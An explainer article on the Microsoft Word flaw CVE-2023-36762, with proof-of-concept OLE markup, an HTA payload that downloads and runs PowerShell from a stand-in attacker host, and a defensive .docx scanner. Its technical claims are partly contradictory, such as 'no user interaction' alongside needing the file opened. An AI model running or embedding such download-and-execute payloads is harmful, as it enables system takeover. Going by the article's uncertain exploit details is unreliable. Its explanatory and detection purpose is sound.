Microsoft Word is one of the most widely-used document editors, trusted by individuals, businesses, and governments. But sometimes, even the most popular software isn’t immune to flaws—a fact made clear by CVE-2023-36762, a critical remote code execution (RCE) vulnerability discovered in Microsoft Word. If you haven't heard of this issue, or you're wondering just how bad it can get, this article unpacks the problem in plain English, with code samples, references, and even details on how this vulnerability is exploited.

What is CVE-2023-36762?

CVE-2023-36762 is a security vulnerability found in Microsoft Word that allows an attacker to run code on a victim’s computer, simply by getting them to open a malicious document. That means an attacker can potentially install malware, steal sensitive files, or take complete control of your system—all it takes is clicking "Open."

Why is it so dangerous?

- No User Interaction Required: The attack can happen even if you only preview the document in the Reading Pane.
- Works Across Multiple Versions: Affects several versions of Microsoft Office, both on-premises and via Microsoft 365 (formerly Office 365).

How does the Vulnerability Work?

Microsoft Word loads embedded OLE (Object Linking and Embedding) objects when a document is opened or previewed. In the case of CVE-2023-36762, a specially crafted object can force Word to download and execute a remote payload without proper security checks.

The Proof-of-Concept (PoC) Code

Attackers often use .docx files with embedded objects pointing to external resources. Here’s a simple demonstration using mshta.exe (Microsoft HTML Application Host, a common tool abused for code execution):

<!-- Malicious OLE Object Embedded in Word Document -->
<o:OLEObject Type="Embed" ProgID="htmlfile" ShapeID="_x000_i1025"
    DrawAspect="Content" ObjectID="_1567222121"
    r:id="rId1"
    UpdateMode="Always">
  <o:Link Src="http://attacker.com/payload.hta"/>
</o:OLEObject>

If a user opens the document, Word reaches out to http://attacker.com/payload.hta and executes whatever it finds there.

Malicious payload example (payload.hta)

<script>
  var wsh = new ActiveXObject("WScript.Shell");
  wsh.Run("cmd.exe /c powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/evil.ps1')\"");
</script>

*This script would download and run a PowerShell script automatically!*

Exploit Details

Attackers send emails with booby-trapped Word docs, typically disguised as invoices, contracts, or shipping notices. All it takes is one click or even a simple mouse-over in the Outlook preview pane.

Example Attack Scenario

> "John in Accounting opens a Word file named Quarterly_Report.docx from a partner. The file pulls in a remote .hta payload, giving the attacker access to all John's company files—no security warning pops up."

Protecting Your Computers

Microsoft released patches in September 2023. You can find the official advisory and patch details here:

- Microsoft Advisory for CVE-2023-36762
- NIST NVD Entry
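
Alongside patching, inbound documents can be triaged for the markup pattern shown earlier. The script below is an added example, not code from the original article or from Microsoft: it unpacks a .docx (a ZIP archive) and flags OLE objects set to update automatically, OLE links with remote sources, and non-hyperlink relationships marked TargetMode="External". The function names, rule names and sample parts are constructed for illustration, and it uses regex matching rather than an XML parser so that no parser runs over untrusted input.

```python
import io
import re
import zipfile

# Constructed sample parts, modelled on the OLE snippet shown in this article.
REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
SAMPLE_DOCUMENT_XML = (
    '<o:OLEObject Type="Embed" ProgID="htmlfile" r:id="rId1" UpdateMode="Always">'
    '<o:Link Src="http://attacker.com/payload.hta"/></o:OLEObject>')
SAMPLE_RELS_XML = (
    f'<Relationships><Relationship Id="rId1" Type="{REL}oleObject" '
    'Target="http://attacker.com/payload.hta" TargetMode="External"/>'
    f'<Relationship Id="rId2" Type="{REL}styles" Target="styles.xml"/>'
    '</Relationships>')

TAG = re.compile(r'<(?:\w+:)?(OLEObject|Link|Relationship)\b([^>]*)>')
ATTR = re.compile(r'([\w:]+)\s*=\s*"([^"]*)"')
REMOTE = re.compile(r'^(?:https?|ftp|file)://|^\\\\', re.I)

def scan_part(name, xml):
    findings = []  # (part name, rule, offending value)
    for kind, raw in TAG.findall(xml):
        a = dict(ATTR.findall(raw))
        if kind == "Relationship" and a.get("TargetMode", "").lower() == "external":
            if not a.get("Type", "").endswith("/hyperlink"):  # links are normal
                findings.append((name, "external-relationship", a.get("Target", "")))
        elif kind == "Link" and REMOTE.search(a.get("Src", "")):
            findings.append((name, "remote-ole-link", a["Src"]))
        elif kind == "OLEObject" and a.get("UpdateMode", "").lower() == "always":
            findings.append((name, "ole-auto-update", a.get("ProgID", "")))
    return findings

def scan_docx(src):
    findings = []  # src: path or file-like object of a .docx (ZIP) file
    with zipfile.ZipFile(src) as z:
        for name in z.namelist():
            if name.endswith((".xml", ".rels")):
                findings += scan_part(name, z.read(name).decode("utf-8", "replace"))
    return findings

def build_sample():
    buf = io.BytesIO()  # constructed in-memory archive holding the two sample parts
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", SAMPLE_DOCUMENT_XML)
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS_XML)
    return buf

if __name__ == "__main__":
    print(*scan_docx(build_sample()), sep="\n")
```

A finding is a reason to quarantine and inspect the file, not proof of exploitation; legitimate documents sometimes link to external objects.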

Conclusion

CVE-2023-36762 is a sobering reminder that even familiar tools can be dangerous if not updated and used wisely. This vulnerability made it easy for attackers to hijack systems with weaponized Word documents. Stay up to date, stay cautious, and always double-check what you’re clicking on.

References & Further Reading

- Microsoft Security Guide: CVE-2023-36762
- NIST NVD: CVE-2023-36762
- Huntress: Dissecting a Recent Word RCE Exploit
- Microsoft: Office OLE Security Settings

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC